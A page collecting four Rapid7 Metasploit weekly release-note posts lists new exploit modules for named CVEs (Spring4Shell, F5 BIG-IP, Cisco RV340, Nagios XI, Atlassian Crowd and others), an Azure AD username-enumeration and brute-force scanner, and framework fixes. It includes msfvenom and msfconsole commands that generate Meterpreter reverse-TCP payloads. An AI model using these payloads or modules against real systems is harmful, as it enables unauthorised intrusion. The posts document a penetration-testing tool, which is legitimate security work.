All posts by Erin Bleiweiss

Metasploit Weekly Wrap-Up

Post Syndicated from Erin Bleiweiss original https://blog.rapid7.com/2022/05/13/metasploit-weekly-wrap-up-156/

Spring4Shell module

Metasploit Weekly Wrap-Up

Community contributor vleminator added a new module which exploits CVE-2022-22965—more commonly known as "Spring4Shell." Depending on its deployment configuration, Java Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older can be vulnerable to unauthenticated remote code execution.

F5 BIG-IP iControl RCE via REST Authentication Bypass module

In addition, we have a new module that targets F5 iControl and exploits CVE-2022-1388, from contributor heyder. This vulnerability allows attackers to bypass iControl’s REST authentication on affected versions and achieve unauthenticated remote code execution as root via the /mgmt/tm/util/bash endpoint.

Cisco RV340 SSL VPN RCE module

The last of the new RCE modules this week—community contributor pedrib added a Cisco RV340 SSL VPN module, which exploits CVE-2022-20699. This module exploits a stack buffer overflow in the default configuration of Cisco RV series routers, and does not require authentication. This module also works over the internet and does not require local network access.

First Class PowerShell Command Payloads

Metasploit has had the ability to execute native 64-bit and 32-bit Windows payloads for quite some time. This functionality was exposed to module authors by way of a mixin which meant that a dedicated target needed to be written. This placed an additional development burden on module authors who wanted to offer powershell commands for in-memory code execution of native payloads. Now module authors can just define the standard command target, and users can select one of the new cmd/windows/powershell* payloads. The new adapter will convert the native code into a powershell command automatically, without additional effort from the module developer.

Since these are new payload modules, they can also be generated directly using MSFVenom:

./msfvenom -p cmd/windows/powershell/meterpreter/reverse_tcp LHOST=192.168.159.128

This is similar to using one of the psh- formatters with the existing -f option. However, because it’s a payload module, the additional Powershell specific options are accessible. For example, the resulting command can be base64-encoded to remove many special characters by setting Powershell::encode_final_payload=true.

New module content (4)

  • F5 BIG-IP iControl RCE via REST Authentication Bypass by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits CVE-2022-1388 – A new module has been added for CVE-2022-1388, a vulnerability in F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions. By making a special request, one can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the root user on affected systems.
  • Cisco RV340 SSL VPN RCE from pedrib, which exploits CVE-2022-20699 – A new module has been added which exploits CVE-2022-20699, an unauthenticated stack overflow RCE vulnerability in the Cisco RV 340 VPN Gateway router. Successful exploitation results in RCE as the root user. This exploit can be triggered over the internet and does not require the attacker to be on the same network as the victim.
  • Spring Framework Class property RCE (Spring4Shell) by vleminator, which exploits CVE-2022-22965 – This adds a module that targets CVE-2022-22965, a remote code execution vulnerability in some installations of Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older. To be vulnerable, the application must be running on JDK 9+ and in this case, packaged and deployed as a war file, though it may be possible to bypass these limitations later.
  • Powershell Command Adapter from zeroSteiner – This adds a new payload adapter for converting native x86 and x64 Windows payloads to command payloads using Powershell.

Enhancements and features (4)

  • #16529 from dwelch-r7 – This updates Mettle payloads to support logging to file and now uses the same options as the other Meterpreters. For example within msfconsole:
use osx/x64/meterpreter_reverse_tcp
generate -f macho -o shell MeterpreterDebugbuild=true MeterpreterDebugLogging='rpath:/tmp/foo.txt'
to_handler
  • #16538 from adfoster-r7 – The Python Meterpreter loader library has been updated to address deprecation warnings that were showing when running these payloads using Python 3.4 and later.
  • #16551 from adfoster-r7 – The documentation for tomcat_mgr_upload.rb has been updated to include additional information on setting up a vulnerable Docker instance to test the module on.
  • #16553 from mauvehed – This updates Metasploit’s .github/SECURITY.md file with the latest steps to follow when raising security issues with Rapid7’s open source projects.

Bugs fixed (8)

  • #16485 from jeffmcjunkin – This updates the version check for the exploit/windows/local/s4u_persistence module to allow it to run on later Windows versions.
  • #16491 from adfoster-r7 – This fixes a bug whereby Meterpreter sessions and modules would crash when encountering a timeout issue due to using an invalid or deprecated error name.
  • #16531 from adfoster-r7 – This fixes a crash in various pihole modules when login authentication is required.
  • #16533 from cdelafuente-r7 – This updates the Meterpreter reg command to correctly handle setting the KEY_WOW64 flag with -w 32 or -w 64 – previously these flag values were unintentionally ignored.
  • #16540 from adfoster-r7 – This fixes an issue with Zeitwerk trying to load Go packages as part of the boot up process.
  • #16542 from sjanusz-r7 – This fixes a bug in msfconsole’s internal book keeping to ensure that closed channels are no longer tracked.
  • #16544 from adfoster-r7 – This updates post module windows/gather/ad_to_sqlite to no longer crash. The module will now additionally store the extracted information as loot.
  • #16560 from Ronni3X – This updates the nessus_connect login functionality to correctly handle the @ symbol being present in the password.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Weekly Wrap-Up

Post Syndicated from Erin Bleiweiss original https://blog.rapid7.com/2022/02/18/metasploit-wrap-up-149/

Nagios XI web shell upload module

Metasploit Weekly Wrap-Up

New this week is a Nagios Web Shell Upload module from Rapid7′ own Jake Baines, which exploits CVE-2021-37343. This module builds upon the existing Nagios XI scanner written by Erik Wynter. Versions of Nagios XI prior to 5.8.5 are vulnerable to a path traversal exploit through an admin-authenticated PHP web shell that results in code execution as the www-data user.

Ignition for Laravel RCE module

Community contributor heyder added a module which exploits CVE-2021-3129 in Ignition for Laravel, versions prior to 2.5.2. This module allows for unauthenticated remote code execution due to insecure usage of the PHP functions file_get_contents() and file_put_contents().

New module content (3)

  • Grandstream UCM62xx IP PBX WebSocket Blind SQL Injection Credential Dump by jbaines-r7, which exploits CVE-2020-5723 – A new module has been added which exploits CVE-2020-5724, a blind SQL injection in GrandStream UCM62xx IP PBX devices prior to firmware version 1.20.22 to dump usernames and passwords from the users table as an unauthenticated attacker. Successfully gathered credentials will be stored in Metasploit’s credential database for use in further attacks.
  • Nagios XI Autodiscovery Webshell Upload by Claroty Team82 and jbaines-r7, which exploits CVE-2021-37343 – This exploits a path traversal vulnerability in Nagios XI versions below 5.8.5 to achieve authenticated code execution as the www-data user.
  • Unauthenticated remote code execution in Ignition by Heyder Andrade and ambionics, which exploits CVE-2021-3129 – This module exploits a vulnerability in Ignition before 2.5.2, as used in Laravel and other products, allows unauthenticated remote attackers to execute arbitrary code because of insecure usage of file_get_contents() and file_put_contents().

Enhancements and features

  • #16076 from bcoles – This change adds the Meterpreter session type to the post/osx/gather/hashdump, hiding a warning when the module is run with a Meterpreter session.
  • #16117 from zeroSteiner – This makes some Log4Shell updates. It refactors the scanner to reduce duplicate code, and fix a couple of minor bugs.
  • #16161 from smashery – This PR updates the user agent strings for HTTP payloads to use the latest user agent strings for Chrome, Edge and Firefox on Windows and MacOS, as well as IPad.
  • #16170 from sjanusz-r7 – This change fixes the native_arch functionality on Java and ensures the native architecture is displayed when running meterpreter > sysinfo on Java.
  • #16173 from AlanFoster – Adds additional --no-readline and --readline options to msfconsole for configuring the use of Readline suppor.t
  • #16181 from AlanFoster – This adds a resource script for extracting the Meterpreter commands from currently open sessions.
  • #16192 from zha0gongz1 – The session notifier has been updated to support notifying about new sessions via WeChat using the ServerJang API and servers.
  • #16195 from darrenmartyn – The hp_dataprotector_cmd_exec.rb module has been updated to support x64 payloads. This fixes a bug whereby x64 payloads were not supported as the Arch value was not set, leading it to default to x86 payloads only.

Bugs fixed

  • #16174 from AlanFoster – This change fixes the mode specification on File.read required for ruby 3 on multiple modules.
  • #16175 from AlanFoster – This change fixes the loadpath command summary to display the module types in alphabetical order.
  • #16177 from AlanFoster – This change fixes the post(test/search) Meterpreter tests on OSX.
  • #16184 from adfoster-r7 – This fixes a crash when running msfconsole on a Windows host in conjunction with the sessions -u command.
  • #16194 from zeroSteiner – This fixes a crash when using Metasploit’s psexec module with the Command target.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Erin Bleiweiss original https://blog.rapid7.com/2021/11/19/metasploit-wrap-up-139/

Azure Active Directory login scanner module

Metasploit Wrap-Up

Community contributor k0pak4 added a new login scanner module for Azure Active Directory. This module exploits a vulnerable authentication endpoint in order to enumerate usernames without generating log events. The error code returned by the endpoint can be used to discover the validity of usernames in the target Azure tenant. If a tenant’s domain is known, the module can also be used to brute-force login credentials by providing a list of usernames and passwords.

Aerohive NetConfig RCE module

Also new this week, community contributor Erik Wynter added an exploit module for Aerohive NetConfig, versions 10.0r8a build-242466 and below. These versions are vulnerable to local file inclusion and log poisoning, as they rely on a version of PHP 5 that is affected by string truncation attacks. This allows users to achieve unauthenticated remote code execution as root on vulnerable systems.

2021 Metasploit community CTF

In case you missed the announcement earlier this week, the 2021 edition of the Metasploit community CTF is set to kick off two weeks from today! Registration starts Monday, November 22 for up to 750 teams, with capacity for an additional 250 teams once play starts on Friday, December 3. Many thanks to TryHackMe for sponsoring the event and providing some great prizes. Find some teammates and mark your calendars, because this year’s event should be a great challenge and a lot of fun for both beginners and CTF veterans!

New module content (4)

  • Jetty WEB-INF File Disclosure by Mayank Deshmukh, cangqingzhe, charlesk40, h00die, and lachlan roberts, which exploits CVE-2021-28164 – This adds an auxiliary module that retrieves sensitive files from Jetty versions 9.4.37.v20210219, 9.4.38.v20210224, 9.4.37-9.4.42, 10.0.1-10.0.5, and 11.0.1-11.0.5 . Protected resources behind the WEB-INF path can be accessed due to servlet implementations improperly handling URIs containing certain encoded characters.
  • Microsoft Azure Active Directory Login Enumeration by Matthew Dunn – k0pak4 – This adds an auxiliary scanner module that leverages Azure Active Directory authentication flaw to enumerate usernames without generating log events. The module also supports brute-forcing passwords against this tenant.
  • Aerohive NetConfig 10.0r8a LFI and log poisoning to RCE by Erik Wynter and Erik de Jong, which exploits CVE-2020-16152 – This change adds a new module to exploit LFI and log poisoning vulnerabilities (CVE-2020-16152) in Aerohive NetConfig, version 10.0r8a build-242466 and older in order to achieve unauthenticated remote code execution as the root user.
  • Sitecore Experience Platform (XP) PreAuth Deserialization RCE by AssetNote and gwillcox-r7, which exploits CVE-2021-42237 – This adds an exploit for CVE-2021-42237 which is an unauthenticated RCE within the Sitecore Experience Platform. The vulnerability is due to the deserialization of untrusted data submitted by the attacker.

Enhancements and features

  • #15796 from zeroSteiner – Support for pivoted SSL server connections as used by capture modules and listeners has been added to Metasploit. The support works for both Meterpreter sessions and SSH sessions.
  • #15851 from smashery – Update several modules and core libraries so that now when sending HTTP requests that include user agents, the user agents are modernized, and are randomized at msfconsole start time. Users can also now request Rex to generate a random user agent from one of the ones in the User Agent pool should they need a random user agent for a particular module.
  • #15862 from smashery – Updates have been made to Linux Meterpreter libraries to support expanding environment variables in several different commands. This should provide users with a smoother experience when using environment variables in commands such as cd, ls, download, upload, mkdir and similar commands.
  • #15867 from h00die – The example modules have been updated to conform to current RuboCop rules and to better reflect recent changes in the Metasploit Framework coding standards, as well as to better showcase various features that may be needed when developing exploits.
  • #15878 from smashery – This fixes an issue whereby tab-completing a remote folder in Meterpreter would append a space onto the end. This change resolves that by not appending the space if we’re potentially in the middle of a tab completion journey, and adding a slash if we’ve completed a directory, providing a smoother tab completion experience for users.

Bugs fixed

  • #15875 from smashery – This fixes an issue with the reverse Bash command shell payloads where they would not work outside of the context of bash.
  • #15879 from jmartin-r7 – Updates batch scanner modules to no longer crash when being able to unable to correctly calculate a scanner thread’s batch size

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

Post Syndicated from Erin Bleiweiss original https://blog.rapid7.com/2021/08/13/metasploit-wrap-up-125/

Print Driver PrivEsc

Metasploit Wrap-Up

If you attended DEF CON last week, you may have seen this talk on print driver vulnerabilities from Metasploit community contributor Jacob Baines. In the spirit of Friday the 13th, we’re highlighting some of these "print nightmares" again, in the form of two new Metasploit modules that Jacob added.
The first is a Canon TR150 Print Driver Local Privilege Escalation module, which exploits CVE-2021-38085. The second is a Lexmark Universal Print Driver Local Privilege Escalation module, which exploits CVE-2021-35449. Both modules target Windows systems with their respective vulnerable print drivers installed, and result in privilege escalation to a SYSTEM user.

Atlassian Crowd RCE

Also new in this week’s release is an Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE module by Rapid7’s own Grant Willcox, which exploits CVE-2019-11580. This vulnerability allows an attacker to upload arbitrary plugins to vulnerable Atlassian Crowd data servers and achieve unauthenticated remote code execution. This module also includes a check method for verifying whether a target is vulnerable to this exploit. It should be noted that this vulnerability made the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of the 12 most routinely exploited vulns for 2020).

New module content (3)

  • Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE by Corben Leo, Grant Willcox, and Paul, which exploits CVE-2019-11580 – This adds an exploit for CVE-2019-11580 which is an unauthenticated RCE within the Atlassian Crowd application. The vulnerability allows for a malicious JAR file to be loaded, resulting in arbitrary Java code execution within the context of the service.
  • Canon Driver Privilege Escalation by Jacob Baines and Shelby Pace, which exploits CVE-2021-38085 – A new module has been added to exploit CVE-2021-38085, a privilege escalation issue in the Canon TR150 Print Driver. Successful exploitation results in code execution as the SYSTEM user.
  • Lexmark Driver Privilege Escalation by Grant Willcox, Jacob Baines, and Shelby Pace, which exploits CVE-2021-35449 – A new module has been added to exploit CVE-2021-35449, a privilege escalation issue in a variety of Lexmark drivers including the Universal Print Driver. Successful exploitation allows local attackers to gain SYSTEM level code execution.

Enhancements and features

  • #15327 from adfoster-r7 – Fixes a regression issue in the RPC analyze command. Adds automated integration tests to ensure it doesn’t break in the future.
  • #15430 from zeroSteiner – This adds support for SSH pivoting by adding a new Command Shell session type for SSH clients. This also updates both auxiliary/scanner/ssh/ssh_login and auxiliary/scanner/ssh/ssh_login_pubkey modules to include these changes. Note that it only supports TCP client connections and only outbound payloads can be used through the SSH pivot at the moment (no reverse payloads).
  • #15493 from jmartin-r7 – Updated Metasploit’s dependency on Rails from version 5.2 to 6.1
  • #15523 from adfoster-r7 – This enhances the console output with additional information on why a session may not be compatible with a post module, such as missing Meterpreter commands.
  • #15535 from adfoster-r7 – The psexec module has been updated to use the SMBSHARE option name instead of SHARE for better consistency across modules. Users can still use the old SHARE option if needed, however this should be considered deprecated.

Bugs fixed

  • #15524 from pingport80 – This fixes a localization-related issue in the post/linux/gather/enum_network module, caused by it searching for language-specific strings in the output to determine success.
  • #15534 from timwr – Fixes a regression issue in post/multi/manage/shell_to_meterpreter where the generated Powershell command length was greater than the limit of 8192 characters after string obfuscation was applied.
  • #15536 from zeroSteiner – The HiveNightmare module has been updated to correctly use the INTERATIONS option instead of the NBRE_ITER option when performing the loop to call check_path(). This fixes an issue where the module would hang whilst users were running it, and ensures the loop correctly terminates after a set number of iterations.
  • #15542 from adfoster-r7 – This fixes a regression with Meterpreter’s initialize methods, which caused Meterpreter scripts to be broken.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).